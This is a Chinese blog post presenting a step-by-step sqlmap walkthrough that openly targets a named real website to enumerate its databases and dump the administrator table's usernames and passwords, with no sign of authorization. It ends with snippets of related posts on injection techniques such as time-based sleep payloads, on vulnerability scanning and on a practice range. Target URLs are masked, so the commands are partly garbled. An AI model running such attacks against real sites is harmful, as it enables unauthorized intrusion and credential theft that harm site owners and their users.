kali之sqlmap應用實戰

2021-09-14 05:22:44 字數 1365 閱讀 7540

好久沒有玩kali,都說kali玩的好,局子進的早,在各大神帖子下,今天打算用sqlmap來獲取某個悲催**的管理員賬號和密碼,www.bible-history.com這個就是傳說中經常被攻擊的**,今天就拿它開刀。

sqlmap工具通常都是用sql自動注入來獲取**管理員密碼。輸入這個**跳轉的**介面如下:

命令一:sqlmap -u 「**」

例如:root@kali:~# sqlmap -u 「?id=2」

例如: root@kali:~# sqlmap -u 「?id=2」 --dbs

例如: root@kali:~# sqlmap -u 「?id=2」 -d bible_history --tables

命令四: sqlmap -u 」 ** 」 -d 資料庫名 -t 表名 --columns

使用命令:root@kali:~# sqlmap -u 「 -d bible_history -t administrators -c admin_id,admin_username,admin_password --dump

Kali學習筆記44 SQLMAP

sqlmap漏洞檢測技術 1.基於布林的盲注檢測 and 1 1 and 1 2等 2.基於時間的盲注檢測 and select from select sleep 20 a 3.基於錯誤的盲注檢測 比如輸入單引號報錯 4.基於聯合查詢的檢測 取決於開發者是否使用迴圈語句,如果使用,才可以查出多條資...

Kali實戰 漏洞掃瞄

在主機發現 埠發現 服務掃瞄得到目標系統開放埠的服務 服務的的軟體版本資訊,繼而可以在軟體的官網上檢視版本資訊以及補丁列表,而高危漏洞則可以直接控制目標系統。在此基礎上對目標系統存在哪些漏洞弱點進行乙個基本的判斷,但是這樣做會有很多弊端,掃瞄的很多埠上跑著各種各樣的服務,你會忙於在各大 上去查詢官方...

sqlmap一次實戰

這是墨者學院乙個sql注入漏洞靶場 目的是尋找key 從這個網頁提示資訊我們也可以窺視出一些東西 它使用的資料庫型別是mysql key的值就儲存於變數裡面 很可能key值就是我們苦苦尋找的flag,那肯定是儲存在資料庫裡面的 先對其進行手工注入 你們懂得就是 在url後面分別新增and 1 1 和...